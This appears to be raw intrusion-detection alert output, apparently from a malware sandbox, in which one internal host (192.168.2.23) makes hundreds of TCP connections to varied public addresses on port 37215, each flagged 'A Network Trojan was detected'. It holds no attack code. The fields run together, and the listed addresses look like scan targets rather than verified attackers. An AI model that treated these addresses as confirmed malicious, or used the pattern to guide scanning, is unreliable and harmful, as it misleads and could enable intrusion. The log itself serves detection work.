      2025-02-12T16:57:55.719375+010028352221A Network Trojan was detected192.168.2.2351564157.255.209.12937215TCP
      2025-02-12T16:57:55.720340+010028352221A Network Trojan was detected192.168.2.234350641.159.216.21337215TCP
      2025-02-12T16:57:55.720346+010028352221A Network Trojan was detected192.168.2.2351548157.78.2.18437215TCP
      2025-02-12T16:57:55.720411+010028352221A Network Trojan was detected192.168.2.2349204197.79.78.12337215TCP
      2025-02-12T16:57:55.720626+010028352221A Network Trojan was detected192.168.2.2347810197.109.84.837215TCP
      2025-02-12T16:57:55.734173+010028352221A Network Trojan was detected192.168.2.235956858.237.131.22837215TCP
      2025-02-12T16:57:55.734286+010028352221A Network Trojan was detected192.168.2.2357184146.134.210.11337215TCP
      2025-02-12T16:57:55.734388+010028352221A Network Trojan was detected192.168.2.2357248157.192.106.17337215TCP
      2025-02-12T16:57:55.734473+010028352221A Network Trojan was detected192.168.2.2344512197.200.50.2837215TCP
      2025-02-12T16:57:55.734587+010028352221A Network Trojan was detected192.168.2.2347542209.30.142.14437215TCP
      2025-02-12T16:57:55.735188+010028352221A Network Trojan was detected192.168.2.2347224157.187.156.8737215TCP
      2025-02-12T16:57:55.735940+010028352221A Network Trojan was detected192.168.2.2346970195.154.207.9737215TCP
      2025-02-12T16:57:55.736121+010028352221A Network Trojan was detected192.168.2.235767041.194.114.13837215TCP
      2025-02-12T16:57:55.736255+010028352221A Network Trojan was detected192.168.2.2348890120.22.45.837215TCP
      2025-02-12T16:57:55.736492+010028352221A Network Trojan was detected192.168.2.2336784157.115.15.8637215TCP
      2025-02-12T16:57:55.737971+010028352221A Network Trojan was detected192.168.2.2359842197.96.233.737215TCP
      2025-02-12T16:57:55.738228+010028352221A Network Trojan was detected192.168.2.234385441.88.205.21237215TCP
      2025-02-12T16:57:55.738240+010028352221A Network Trojan was detected192.168.2.2335308103.33.250.937215TCP
      2025-02-12T16:57:55.738311+010028352221A Network Trojan was detected192.168.2.2346430115.254.37.21137215TCP
      2025-02-12T16:57:55.750308+010028352221A Network Trojan was detected192.168.2.235220641.118.1.21337215TCP
      2025-02-12T16:57:55.753043+010028352221A Network Trojan was detected192.168.2.2351024157.5.231.6637215TCP
      2025-02-12T16:57:55.753629+010028352221A Network Trojan was detected192.168.2.235062491.33.152.18837215TCP
      2025-02-12T16:57:55.753712+010028352221A Network Trojan was detected192.168.2.2344066197.243.244.2437215TCP
      2025-02-12T16:57:55.753738+010028352221A Network Trojan was detected192.168.2.2349460197.214.164.6837215TCP
      2025-02-12T16:57:55.753834+010028352221A Network Trojan was detected192.168.2.2346546157.78.95.9437215TCP
      2025-02-12T16:57:55.753920+010028352221A Network Trojan was detected192.168.2.234958423.3.155.6937215TCP
      2025-02-12T16:57:55.754038+010028352221A Network Trojan was detected192.168.2.235940439.16.91.6237215TCP
      2025-02-12T16:57:55.755519+010028352221A Network Trojan was detected192.168.2.2344206158.246.70.1437215TCP
      2025-02-12T16:57:55.755578+010028352221A Network Trojan was detected192.168.2.235670041.135.23.20237215TCP
      2025-02-12T16:57:55.767625+010028352221A Network Trojan was detected192.168.2.2349184157.86.205.7037215TCP
      2025-02-12T16:57:55.769186+010028352221A Network Trojan was detected192.168.2.2351908197.114.128.12137215TCP
      2025-02-12T16:57:55.769384+010028352221A Network Trojan was detected192.168.2.234663825.247.126.24137215TCP
      2025-02-12T16:57:55.771354+010028352221A Network Trojan was detected192.168.2.2334034197.135.90.8437215TCP
      2025-02-12T16:57:56.655726+010028352221A Network Trojan was detected192.168.2.2356128175.251.91.25237215TCP
      2025-02-12T16:57:56.718947+010028352221A Network Trojan was detected192.168.2.234003441.34.80.13437215TCP
      2025-02-12T16:57:56.734591+010028352221A Network Trojan was detected192.168.2.2341502197.164.219.9837215TCP
      2025-02-12T16:57:56.734616+010028352221A Network Trojan was detected192.168.2.2354474197.81.189.17737215TCP
      2025-02-12T16:57:56.734662+010028352221A Network Trojan was detected192.168.2.235815041.84.193.14937215TCP
      2025-02-12T16:57:56.734922+010028352221A Network Trojan was detected192.168.2.2353464157.78.90.22037215TCP
      2025-02-12T16:57:56.735048+010028352221A Network Trojan was detected192.168.2.2333284197.150.153.17637215TCP
      2025-02-12T16:57:56.735165+010028352221A Network Trojan was detected192.168.2.233636441.53.222.7437215TCP
      2025-02-12T16:57:56.735209+010028352221A Network Trojan was detected192.168.2.2345242197.250.25.1137215TCP
      2025-02-12T16:57:56.735342+010028352221A Network Trojan was detected192.168.2.2351102197.83.128.15737215TCP
      2025-02-12T16:57:56.735428+010028352221A Network Trojan was detected192.168.2.2334998217.244.170.12637215TCP
      2025-02-12T16:57:56.735717+010028352221A Network Trojan was detected192.168.2.233511241.171.250.2937215TCP
      2025-02-12T16:57:56.735846+010028352221A Network Trojan was detected192.168.2.234659841.140.4.7537215TCP
      2025-02-12T16:57:56.735914+010028352221A Network Trojan was detected192.168.2.2355344197.36.175.24437215TCP
      2025-02-12T16:57:56.735978+010028352221A Network Trojan was detected192.168.2.2347994197.28.136.9937215TCP
      2025-02-12T16:57:56.736030+010028352221A Network Trojan was detected192.168.2.235948041.64.227.12037215TCP
      2025-02-12T16:57:56.736186+010028352221A Network Trojan was detected192.168.2.2352116197.158.13.21537215TCP
      2025-02-12T16:57:56.736268+010028352221A Network Trojan was detected192.168.2.2351226157.121.74.12837215TCP
      2025-02-12T16:57:56.736377+010028352221A Network Trojan was detected192.168.2.235913841.213.27.25237215TCP
      2025-02-12T16:57:56.736478+010028352221A Network Trojan was detected192.168.2.234460841.208.169.25537215TCP
      2025-02-12T16:57:56.736495+010028352221A Network Trojan was detected192.168.2.2344860157.102.28.14137215TCP
      2025-02-12T16:57:56.736606+010028352221A Network Trojan was detected192.168.2.235223058.123.56.16137215TCP
      2025-02-12T16:57:56.736660+010028352221A Network Trojan was detected192.168.2.2334068157.160.51.11437215TCP
      2025-02-12T16:57:56.736875+010028352221A Network Trojan was detected192.168.2.234578070.15.108.10437215TCP
      2025-02-12T16:57:56.736982+010028352221A Network Trojan was detected192.168.2.233884041.108.108.9837215TCP
      2025-02-12T16:57:56.737145+010028352221A Network Trojan was detected192.168.2.2337514197.54.141.7537215TCP
      2025-02-12T16:57:56.737246+010028352221A Network Trojan was detected192.168.2.2341336122.238.76.20437215TCP
      2025-02-12T16:57:56.737312+010028352221A Network Trojan was detected192.168.2.2353430197.211.210.12837215TCP
      2025-02-12T16:57:56.737390+010028352221A Network Trojan was detected192.168.2.2359610197.240.208.13137215TCP
      2025-02-12T16:57:56.737538+010028352221A Network Trojan was detected192.168.2.2334624197.226.6.25237215TCP
      2025-02-12T16:57:56.737658+010028352221A Network Trojan was detected192.168.2.2346362197.131.148.7537215TCP
      2025-02-12T16:57:56.737699+010028352221A Network Trojan was detected192.168.2.2349470157.101.247.7837215TCP
      2025-02-12T16:57:56.737831+010028352221A Network Trojan was detected192.168.2.235524041.99.107.7937215TCP
      2025-02-12T16:57:56.737876+010028352221A Network Trojan was detected192.168.2.234751041.18.214.15837215TCP
      2025-02-12T16:57:56.737957+010028352221A Network Trojan was detected192.168.2.234300494.193.113.24337215TCP
      2025-02-12T16:57:56.738014+010028352221A Network Trojan was detected192.168.2.234456241.101.90.24237215TCP
      2025-02-12T16:57:56.738088+010028352221A Network Trojan was detected192.168.2.2358382197.153.145.13237215TCP
      2025-02-12T16:57:56.738210+010028352221A Network Trojan was detected192.168.2.2350126157.206.122.24937215TCP
      2025-02-12T16:57:56.738323+010028352221A Network Trojan was detected192.168.2.2349526136.70.2.22737215TCP
      2025-02-12T16:57:56.738556+010028352221A Network Trojan was detected192.168.2.2334908157.122.25.6537215TCP
      2025-02-12T16:57:56.738556+010028352221A Network Trojan was detected192.168.2.2354524157.40.29.17137215TCP
      2025-02-12T16:57:56.738670+010028352221A Network Trojan was detected192.168.2.2333900197.14.238.17637215TCP
      2025-02-12T16:57:56.738694+010028352221A Network Trojan was detected192.168.2.2355374222.231.126.5237215TCP
      2025-02-12T16:57:56.738905+010028352221A Network Trojan was detected192.168.2.2359280197.141.52.11937215TCP
      2025-02-12T16:57:56.739024+010028352221A Network Trojan was detected192.168.2.2345734184.71.253.7137215TCP
      2025-02-12T16:57:56.739129+010028352221A Network Trojan was detected192.168.2.2360826157.51.241.17937215TCP
      2025-02-12T16:57:56.739333+010028352221A Network Trojan was detected192.168.2.2358742157.127.202.9837215TCP
      2025-02-12T16:57:56.739418+010028352221A Network Trojan was detected192.168.2.2354216197.125.59.12937215TCP
      2025-02-12T16:57:56.739530+010028352221A Network Trojan was detected192.168.2.2350506157.79.65.21337215TCP
      2025-02-12T16:57:56.739635+010028352221A Network Trojan was detected192.168.2.235302441.52.96.3637215TCP
      2025-02-12T16:57:56.739671+010028352221A Network Trojan was detected192.168.2.2341270157.181.130.16937215TCP
      2025-02-12T16:57:56.739814+010028352221A Network Trojan was detected192.168.2.2359390197.202.219.23237215TCP
      2025-02-12T16:57:56.739818+010028352221A Network Trojan was detected192.168.2.2344464157.173.74.12437215TCP
      2025-02-12T16:57:56.739847+010028352221A Network Trojan was detected192.168.2.235240870.191.174.11537215TCP
      2025-02-12T16:57:56.739936+010028352221A Network Trojan was detected192.168.2.2348500197.88.229.25237215TCP
      2025-02-12T16:57:56.740056+010028352221A Network Trojan was detected192.168.2.2352936197.240.77.14737215TCP
      2025-02-12T16:57:56.740065+010028352221A Network Trojan was detected192.168.2.234382841.57.239.24237215TCP
      2025-02-12T16:57:56.740244+010028352221A Network Trojan was detected192.168.2.2355206197.74.148.21037215TCP
      2025-02-12T16:57:56.740300+010028352221A Network Trojan was detected192.168.2.235967841.210.56.25337215TCP
      2025-02-12T16:57:56.740467+010028352221A Network Trojan was detected192.168.2.2342938197.98.198.10937215TCP
      2025-02-12T16:57:56.740502+010028352221A Network Trojan was detected192.168.2.234749241.239.239.17237215TCP
      2025-02-12T16:57:56.740612+010028352221A Network Trojan was detected192.168.2.233894641.238.64.21237215TCP
      2025-02-12T16:57:56.740626+010028352221A Network Trojan was detected192.168.2.2358150197.198.129.5137215TCP
      2025-02-12T16:57:56.740710+010028352221A Network Trojan was detected192.168.2.2343320157.129.184.22837215TCP
      2025-02-12T16:57:56.740752+010028352221A Network Trojan was detected192.168.2.2338872191.157.202.14537215TCP
      2025-02-12T16:57:56.740809+010028352221A Network Trojan was detected192.168.2.235072841.204.157.7037215TCP
      2025-02-12T16:57:56.740882+010028352221A Network Trojan was detected192.168.2.234840441.217.98.4637215TCP
      2025-02-12T16:57:56.741044+010028352221A Network Trojan was detected192.168.2.2345950172.249.185.20737215TCP
      2025-02-12T16:57:56.741139+010028352221A Network Trojan was detected192.168.2.2347640197.164.140.12637215TCP
      2025-02-12T16:57:56.741241+010028352221A Network Trojan was detected192.168.2.2347522197.197.63.2137215TCP
      2025-02-12T16:57:56.741625+010028352221A Network Trojan was detected192.168.2.2349770157.59.185.14637215TCP
      2025-02-12T16:57:56.741777+010028352221A Network Trojan was detected192.168.2.2350140197.103.14.10637215TCP
      2025-02-12T16:57:56.741821+010028352221A Network Trojan was detected192.168.2.235058641.97.87.14037215TCP
      2025-02-12T16:57:56.741885+010028352221A Network Trojan was detected192.168.2.2348510197.109.186.2737215TCP
      2025-02-12T16:57:56.742053+010028352221A Network Trojan was detected192.168.2.2342582197.113.38.14037215TCP
      2025-02-12T16:57:56.742149+010028352221A Network Trojan was detected192.168.2.2354044197.122.126.21737215TCP
      2025-02-12T16:57:56.742808+010028352221A Network Trojan was detected192.168.2.2355428197.136.76.8437215TCP
      2025-02-12T16:57:56.749746+010028352221A Network Trojan was detected192.168.2.2359820197.80.253.25137215TCP
      2025-02-12T16:57:56.753808+010028352221A Network Trojan was detected192.168.2.235670641.141.47.11337215TCP
      2025-02-12T16:57:56.753990+010028352221A Network Trojan was detected192.168.2.234686641.50.170.9937215TCP
      2025-02-12T16:57:56.755400+010028352221A Network Trojan was detected192.168.2.233381241.87.194.11237215TCP
      2025-02-12T16:57:56.767479+010028352221A Network Trojan was detected192.168.2.2342616183.255.89.2037215TCP
      2025-02-12T16:57:56.769159+010028352221A Network Trojan was detected192.168.2.2350796197.134.190.6837215TCP
      2025-02-12T16:57:56.769351+010028352221A Network Trojan was detected192.168.2.2336560180.123.59.2137215TCP
      2025-02-12T16:57:56.769442+010028352221A Network Trojan was detected192.168.2.233952618.95.99.20937215TCP
      2025-02-12T16:57:56.769572+010028352221A Network Trojan was detected192.168.2.2359660132.246.116.15937215TCP
      2025-02-12T16:57:56.769645+010028352221A Network Trojan was detected192.168.2.234477441.66.136.21737215TCP
      2025-02-12T16:57:56.769696+010028352221A Network Trojan was detected192.168.2.234245441.117.182.9837215TCP
      2025-02-12T16:57:56.770256+010028352221A Network Trojan was detected192.168.2.233585841.211.232.12437215TCP
      2025-02-12T16:57:56.770371+010028352221A Network Trojan was detected192.168.2.2353738130.230.121.19437215TCP
      2025-02-12T16:57:56.770939+010028352221A Network Trojan was detected192.168.2.2348344197.90.107.2737215TCP
      2025-02-12T16:57:56.771048+010028352221A Network Trojan was detected192.168.2.236010841.247.84.11337215TCP
      2025-02-12T16:57:57.501348+010028352221A Network Trojan was detected192.168.2.234836441.44.19.6037215TCP
      2025-02-12T16:57:57.734306+010028352221A Network Trojan was detected192.168.2.235020240.202.141.1337215TCP
      2025-02-12T16:57:57.750113+010028352221A Network Trojan was detected192.168.2.2340120157.252.35.1737215TCP
      2025-02-12T16:57:57.750136+010028352221A Network Trojan was detected192.168.2.2348676157.181.245.11137215TCP
      2025-02-12T16:57:57.750340+010028352221A Network Trojan was detected192.168.2.235938241.64.169.9437215TCP
      2025-02-12T16:57:57.750466+010028352221A Network Trojan was detected192.168.2.2344336157.39.149.15237215TCP
      2025-02-12T16:57:57.750667+010028352221A Network Trojan was detected192.168.2.23360384.210.171.5737215TCP
      2025-02-12T16:57:57.750716+010028352221A Network Trojan was detected192.168.2.2356446197.111.150.837215TCP
      2025-02-12T16:57:57.751543+010028352221A Network Trojan was detected192.168.2.2355192197.145.57.18537215TCP
      2025-02-12T16:57:57.751609+010028352221A Network Trojan was detected192.168.2.2349974112.60.77.1337215TCP
      2025-02-12T16:57:57.752101+010028352221A Network Trojan was detected192.168.2.2355638157.249.3.6637215TCP
      2025-02-12T16:57:57.752132+010028352221A Network Trojan was detected192.168.2.2333566157.19.137.1737215TCP
      2025-02-12T16:57:57.752174+010028352221A Network Trojan was detected192.168.2.2346464145.146.185.22437215TCP
      2025-02-12T16:57:57.753798+010028352221A Network Trojan was detected192.168.2.235328641.235.11.10537215TCP
      2025-02-12T16:57:57.753883+010028352221A Network Trojan was detected192.168.2.233671441.156.201.14837215TCP
      2025-02-12T16:57:57.754116+010028352221A Network Trojan was detected192.168.2.2335752157.55.74.1937215TCP
      2025-02-12T16:57:57.754129+010028352221A Network Trojan was detected192.168.2.2347550197.29.16.7437215TCP
      2025-02-12T16:57:57.754141+010028352221A Network Trojan was detected192.168.2.2353614157.166.10.15537215TCP
      2025-02-12T16:57:57.765973+010028352221A Network Trojan was detected192.168.2.234045041.156.247.16737215TCP
      2025-02-12T16:57:57.766062+010028352221A Network Trojan was detected192.168.2.2353670157.226.3.17837215TCP
      2025-02-12T16:57:57.766217+010028352221A Network Trojan was detected192.168.2.235494641.224.67.7837215TCP
      2025-02-12T16:57:57.766218+010028352221A Network Trojan was detected192.168.2.2333864207.227.62.17237215TCP
      2025-02-12T16:57:57.766490+010028352221A Network Trojan was detected192.168.2.2334584157.174.11.21037215TCP
      2025-02-12T16:57:57.766490+010028352221A Network Trojan was detected192.168.2.2358984119.195.148.20837215TCP
      2025-02-12T16:57:57.766492+010028352221A Network Trojan was detected192.168.2.2357820157.80.63.17337215TCP
      2025-02-12T16:57:57.766492+010028352221A Network Trojan was detected192.168.2.2347024157.154.192.3337215TCP
      2025-02-12T16:57:57.767687+010028352221A Network Trojan was detected192.168.2.234899841.44.247.9637215TCP
      2025-02-12T16:57:57.767882+010028352221A Network Trojan was detected192.168.2.234046641.127.96.21237215TCP
      2025-02-12T16:57:57.770039+010028352221A Network Trojan was detected192.168.2.233343641.50.238.6137215TCP
      2025-02-12T16:57:57.770052+010028352221A Network Trojan was detected192.168.2.2352236160.72.245.16637215TCP
      2025-02-12T16:57:57.770157+010028352221A Network Trojan was detected192.168.2.2355430197.183.137.4937215TCP
      2025-02-12T16:57:57.770381+010028352221A Network Trojan was detected192.168.2.2341034197.112.251.14437215TCP
      2025-02-12T16:57:57.771867+010028352221A Network Trojan was detected192.168.2.235819841.7.241.437215TCP
      2025-02-12T16:57:57.772151+010028352221A Network Trojan was detected192.168.2.2358914189.197.176.16637215TCP
      2025-02-12T16:57:57.780619+010028352221A Network Trojan was detected192.168.2.23454544.188.74.937215TCP
      2025-02-12T16:57:58.769726+010028352221A Network Trojan was detected192.168.2.2334840157.223.22.4737215TCP
      2025-02-12T16:57:58.799849+010028352221A Network Trojan was detected192.168.2.235208841.172.91.24537215TCP
      2025-02-12T16:57:58.818471+010028352221A Network Trojan was detected192.168.2.233836641.20.197.15137215TCP
      2025-02-12T16:57:59.765877+010028352221A Network Trojan was detected192.168.2.2340394157.112.9.4137215TCP
      2025-02-12T16:57:59.798572+010028352221A Network Trojan was detected192.168.2.2360014157.150.134.10737215TCP
      2025-02-12T16:57:59.812587+010028352221A Network Trojan was detected192.168.2.2347626197.215.121.15337215TCP
      2025-02-12T16:57:59.816603+010028352221A Network Trojan was detected192.168.2.2353800157.7.139.12437215TCP
      2025-02-12T16:57:59.830217+010028352221A Network Trojan was detected192.168.2.2338986157.120.253.20637215TCP
      2025-02-12T16:57:59.845380+010028352221A Network Trojan was detected192.168.2.2359844188.104.234.17337215TCP
      2025-02-12T16:58:00.812512+010028352221A Network Trojan was detected192.168.2.2335408188.184.114.18037215TCP
      2025-02-12T16:58:00.812597+010028352221A Network Trojan was detected192.168.2.2351758190.178.151.19637215TCP
      2025-02-12T16:58:00.812644+010028352221A Network Trojan was detected192.168.2.2350938157.95.164.18437215TCP
      2025-02-12T16:58:00.812788+010028352221A Network Trojan was detected192.168.2.2356756157.147.200.4037215TCP
      2025-02-12T16:58:00.812866+010028352221A Network Trojan was detected192.168.2.2350062197.138.145.4537215TCP
      2025-02-12T16:58:00.812970+010028352221A Network Trojan was detected192.168.2.2338878197.246.210.24337215TCP
      2025-02-12T16:58:00.813223+010028352221A Network Trojan was detected192.168.2.2349598197.205.15.4937215TCP
      2025-02-12T16:58:00.813244+010028352221A Network Trojan was detected192.168.2.2358980197.187.129.17237215TCP
      2025-02-12T16:58:00.813426+010028352221A Network Trojan was detected192.168.2.234725883.244.186.18237215TCP
      2025-02-12T16:58:00.813564+010028352221A Network Trojan was detected192.168.2.235325238.218.195.12937215TCP
      2025-02-12T16:58:00.813643+010028352221A Network Trojan was detected192.168.2.235364641.185.231.10937215TCP
      2025-02-12T16:58:00.813709+010028352221A Network Trojan was detected192.168.2.2344534157.102.35.16037215TCP
      2025-02-12T16:58:00.813748+010028352221A Network Trojan was detected192.168.2.235901841.229.27.3737215TCP
      2025-02-12T16:58:00.813921+010028352221A Network Trojan was detected192.168.2.2342582197.80.179.18137215TCP
      2025-02-12T16:58:00.814069+010028352221A Network Trojan was detected192.168.2.2343054157.245.156.21737215TCP
      2025-02-12T16:58:00.814231+010028352221A Network Trojan was detected192.168.2.2345898157.173.76.22337215TCP
      2025-02-12T16:58:00.814292+010028352221A Network Trojan was detected192.168.2.235410841.187.210.12237215TCP
      2025-02-12T16:58:00.815383+010028352221A Network Trojan was detected192.168.2.234436441.109.52.10237215TCP
      2025-02-12T16:58:00.816607+010028352221A Network Trojan was detected192.168.2.235467841.179.193.20437215TCP
      2025-02-12T16:58:00.816714+010028352221A Network Trojan was detected192.168.2.2355326157.169.0.12637215TCP
      2025-02-12T16:58:00.828173+010028352221A Network Trojan was detected192.168.2.235007085.94.70.7137215TCP
      2025-02-12T16:58:00.829701+010028352221A Network Trojan was detected192.168.2.2338680197.195.81.2737215TCP
      2025-02-12T16:58:00.831200+010028352221A Network Trojan was detected192.168.2.2355466157.255.103.14537215TCP
      2025-02-12T16:58:00.831713+010028352221A Network Trojan was detected192.168.2.2336676157.237.62.16637215TCP
      2025-02-12T16:58:00.831871+010028352221A Network Trojan was detected192.168.2.235550896.189.36.937215TCP
      2025-02-12T16:58:00.831932+010028352221A Network Trojan was detected192.168.2.234237680.169.222.14337215TCP
      2025-02-12T16:58:00.831997+010028352221A Network Trojan was detected192.168.2.233733841.189.1.15637215TCP
      2025-02-12T16:58:00.832263+010028352221A Network Trojan was detected192.168.2.2335144119.73.43.16237215TCP
      2025-02-12T16:58:00.833579+010028352221A Network Trojan was detected192.168.2.2348580197.176.85.8037215TCP
      2025-02-12T16:58:00.833609+010028352221A Network Trojan was detected192.168.2.2348820157.77.234.25237215TCP
      2025-02-12T16:58:00.843946+010028352221A Network Trojan was detected192.168.2.2360100157.136.4.19537215TCP
      2025-02-12T16:58:00.845366+010028352221A Network Trojan was detected192.168.2.234619041.213.129.22737215TCP
      2025-02-12T16:58:00.845515+010028352221A Network Trojan was detected192.168.2.2339990157.201.188.22537215TCP
      2025-02-12T16:58:00.845528+010028352221A Network Trojan was detected192.168.2.2336016103.155.191.20037215TCP
      2025-02-12T16:58:00.845675+010028352221A Network Trojan was detected192.168.2.2354632157.125.4.3337215TCP
      2025-02-12T16:58:00.845742+010028352221A Network Trojan was detected192.168.2.233651041.6.38.1837215TCP
      2025-02-12T16:58:00.847573+010028352221A Network Trojan was detected192.168.2.235288677.112.217.12537215TCP
      2025-02-12T16:58:00.847676+010028352221A Network Trojan was detected192.168.2.233890641.183.245.14937215TCP
      2025-02-12T16:58:00.847792+010028352221A Network Trojan was detected192.168.2.2349298157.63.159.20137215TCP
      2025-02-12T16:58:00.847859+010028352221A Network Trojan was detected192.168.2.236053841.45.106.24437215TCP
      2025-02-12T16:58:00.847926+010028352221A Network Trojan was detected192.168.2.2346116197.126.9.13037215TCP
      2025-02-12T16:58:00.848017+010028352221A Network Trojan was detected192.168.2.233358041.186.34.10337215TCP
      2025-02-12T16:58:00.848591+010028352221A Network Trojan was detected192.168.2.2348064197.157.70.25437215TCP
      2025-02-12T16:58:00.849154+010028352221A Network Trojan was detected192.168.2.234052441.26.59.12237215TCP
      2025-02-12T16:58:00.849561+010028352221A Network Trojan was detected192.168.2.2356930197.211.117.13637215TCP
      2025-02-12T16:58:00.849607+010028352221A Network Trojan was detected192.168.2.234087241.87.174.8137215TCP
      2025-02-12T16:58:00.859279+010028352221A Network Trojan was detected192.168.2.234362417.66.17.5937215TCP
      2025-02-12T16:58:00.860004+010028352221A Network Trojan was detected192.168.2.2358546197.211.92.237215TCP
      2025-02-12T16:58:00.861248+010028352221A Network Trojan was detected192.168.2.2339718197.97.191.8237215TCP
      2025-02-12T16:58:00.862969+010028352221A Network Trojan was detected192.168.2.234861273.15.45.20737215TCP
      2025-02-12T16:58:00.863303+010028352221A Network Trojan was detected192.168.2.235222452.108.252.13737215TCP
      2025-02-12T16:58:00.863422+010028352221A Network Trojan was detected192.168.2.2344890197.142.93.21537215TCP
      2025-02-12T16:58:00.864061+010028352221A Network Trojan was detected192.168.2.2349516131.162.215.23437215TCP
      2025-02-12T16:58:01.843680+010028352221A Network Trojan was detected192.168.2.235374241.191.85.23037215TCP
      2025-02-12T16:58:01.843720+010028352221A Network Trojan was detected192.168.2.2343492197.177.153.2437215TCP
      2025-02-12T16:58:01.843791+010028352221A Network Trojan was detected192.168.2.234258464.227.58.24237215TCP
      2025-02-12T16:58:01.846674+010028352221A Network Trojan was detected192.168.2.2355596157.239.222.8437215TCP
      2025-02-12T16:58:01.846750+010028352221A Network Trojan was detected192.168.2.2343258157.56.147.14837215TCP
      2025-02-12T16:58:01.847882+010028352221A Network Trojan was detected192.168.2.234842041.111.83.20337215TCP
      2025-02-12T16:58:01.849327+010028352221A Network Trojan was detected192.168.2.2335530197.58.75.4737215TCP
      2025-02-12T16:58:01.859448+010028352221A Network Trojan was detected192.168.2.2339576197.22.104.6237215TCP
      2025-02-12T16:58:01.859654+010028352221A Network Trojan was detected192.168.2.2338234176.249.25.16137215TCP
      2025-02-12T16:58:01.859744+010028352221A Network Trojan was detected192.168.2.2337286157.253.144.23837215TCP
      2025-02-12T16:58:01.859967+010028352221A Network Trojan was detected192.168.2.2341516157.129.2.137215TCP
      2025-02-12T16:58:01.860090+010028352221A Network Trojan was detected192.168.2.2342826197.65.225.1837215TCP
      2025-02-12T16:58:01.860156+010028352221A Network Trojan was detected192.168.2.2357180157.145.123.21437215TCP
      2025-02-12T16:58:01.861176+010028352221A Network Trojan was detected192.168.2.2347650188.156.247.6937215TCP
      2025-02-12T16:58:01.861258+010028352221A Network Trojan was detected192.168.2.2352274157.16.124.15637215TCP
      2025-02-12T16:58:01.861326+010028352221A Network Trojan was detected192.168.2.2334910157.241.23.24537215TCP
      2025-02-12T16:58:01.862623+010028352221A Network Trojan was detected192.168.2.2337546197.233.44.13637215TCP
      2025-02-12T16:58:01.863094+010028352221A Network Trojan was detected192.168.2.2339312157.145.124.16837215TCP
      2025-02-12T16:58:01.863227+010028352221A Network Trojan was detected192.168.2.2333294157.61.98.13037215TCP
      2025-02-12T16:58:01.863403+010028352221A Network Trojan was detected192.168.2.2343714197.113.140.12837215TCP
      2025-02-12T16:58:01.863542+010028352221A Network Trojan was detected192.168.2.2358254197.196.188.2737215TCP
      2025-02-12T16:58:02.272529+010028352221A Network Trojan was detected192.168.2.2342938120.80.108.16037215TCP
      2025-02-12T16:58:03.862100+010028352221A Network Trojan was detected192.168.2.2346796221.148.192.16637215TCP
      2025-02-12T16:58:04.890668+010028352221A Network Trojan was detected192.168.2.2346256186.26.79.10837215TCP
      2025-02-12T16:58:04.890789+010028352221A Network Trojan was detected192.168.2.2337874197.138.202.24937215TCP
      2025-02-12T16:58:05.859680+010028352221A Network Trojan was detected192.168.2.2350622157.160.200.23537215TCP
      2025-02-12T16:58:05.859693+010028352221A Network Trojan was detected192.168.2.2358976157.55.230.20137215TCP
      2025-02-12T16:58:05.859790+010028352221A Network Trojan was detected192.168.2.234205241.222.120.20137215TCP
      2025-02-12T16:58:05.859791+010028352221A Network Trojan was detected192.168.2.2355944203.151.242.7137215TCP
      2025-02-12T16:58:05.861271+010028352221A Network Trojan was detected192.168.2.234968857.211.151.20737215TCP
      2025-02-12T16:58:05.864437+010028352221A Network Trojan was detected192.168.2.233283841.59.101.9137215TCP
      2025-02-12T16:58:05.875223+010028352221A Network Trojan was detected192.168.2.2342730157.175.12.16537215TCP
      2025-02-12T16:58:05.875230+010028352221A Network Trojan was detected192.168.2.2359338157.44.59.23237215TCP
      2025-02-12T16:58:05.876758+010028352221A Network Trojan was detected192.168.2.2357086140.224.120.17237215TCP
      2025-02-12T16:58:05.876861+010028352221A Network Trojan was detected192.168.2.234218041.24.82.21637215TCP
      2025-02-12T16:58:05.879112+010028352221A Network Trojan was detected192.168.2.2357598197.82.158.15737215TCP
      2025-02-12T16:58:05.890819+010028352221A Network Trojan was detected192.168.2.235729041.173.95.8737215TCP
      2025-02-12T16:58:05.890922+010028352221A Network Trojan was detected192.168.2.2337218197.226.18.14437215TCP
      2025-02-12T16:58:05.891124+010028352221A Network Trojan was detected192.168.2.233326641.134.238.18237215TCP
      2025-02-12T16:58:05.891196+010028352221A Network Trojan was detected192.168.2.2357908157.9.37.20737215TCP
      2025-02-12T16:58:05.891291+010028352221A Network Trojan was detected192.168.2.2359474197.198.47.2237215TCP
      2025-02-12T16:58:05.892380+010028352221A Network Trojan was detected192.168.2.2346998157.21.141.14237215TCP
      2025-02-12T16:58:05.893001+010028352221A Network Trojan was detected192.168.2.2343362197.118.241.137215TCP
      2025-02-12T16:58:05.893872+010028352221A Network Trojan was detected192.168.2.2354052197.93.0.9737215TCP
      2025-02-12T16:58:05.893972+010028352221A Network Trojan was detected192.168.2.2344284157.29.25.23737215TCP
      2025-02-12T16:58:05.894469+010028352221A Network Trojan was detected192.168.2.235754441.135.128.24837215TCP
      2025-02-12T16:58:05.894865+010028352221A Network Trojan was detected192.168.2.234443698.251.12.2837215TCP
      2025-02-12T16:58:05.894877+010028352221A Network Trojan was detected192.168.2.233591241.53.222.6737215TCP
      2025-02-12T16:58:05.894943+010028352221A Network Trojan was detected192.168.2.234372841.94.208.10437215TCP
      2025-02-12T16:58:05.895026+010028352221A Network Trojan was detected192.168.2.235623641.52.34.9337215TCP
      2025-02-12T16:58:05.895083+010028352221A Network Trojan was detected192.168.2.235128041.164.42.9737215TCP
      2025-02-12T16:58:05.895083+010028352221A Network Trojan was detected192.168.2.2360622197.242.225.23237215TCP
      2025-02-12T16:58:05.895298+010028352221A Network Trojan was detected192.168.2.2359666200.74.35.15737215TCP
      2025-02-12T16:58:05.895468+010028352221A Network Trojan was detected192.168.2.2348970174.129.192.13237215TCP
      2025-02-12T16:58:05.895576+010028352221A Network Trojan was detected192.168.2.233311241.117.213.4737215TCP
      2025-02-12T16:58:05.896254+010028352221A Network Trojan was detected192.168.2.234488083.168.216.13137215TCP
      2025-02-12T16:58:05.910063+010028352221A Network Trojan was detected192.168.2.235622631.21.240.11237215TCP
      2025-02-12T16:58:06.890848+010028352221A Network Trojan was detected192.168.2.2344400200.151.176.13537215TCP
      2025-02-12T16:58:06.890935+010028352221A Network Trojan was detected192.168.2.2356326157.161.41.18137215TCP
      2025-02-12T16:58:06.891102+010028352221A Network Trojan was detected192.168.2.2348780197.83.58.8437215TCP
      2025-02-12T16:58:06.891261+010028352221A Network Trojan was detected192.168.2.233487239.55.146.15037215TCP
      2025-02-12T16:58:06.891342+010028352221A Network Trojan was detected192.168.2.2336762157.74.132.19637215TCP
      2025-02-12T16:58:06.891467+010028352221A Network Trojan was detected192.168.2.2348232197.143.240.15937215TCP
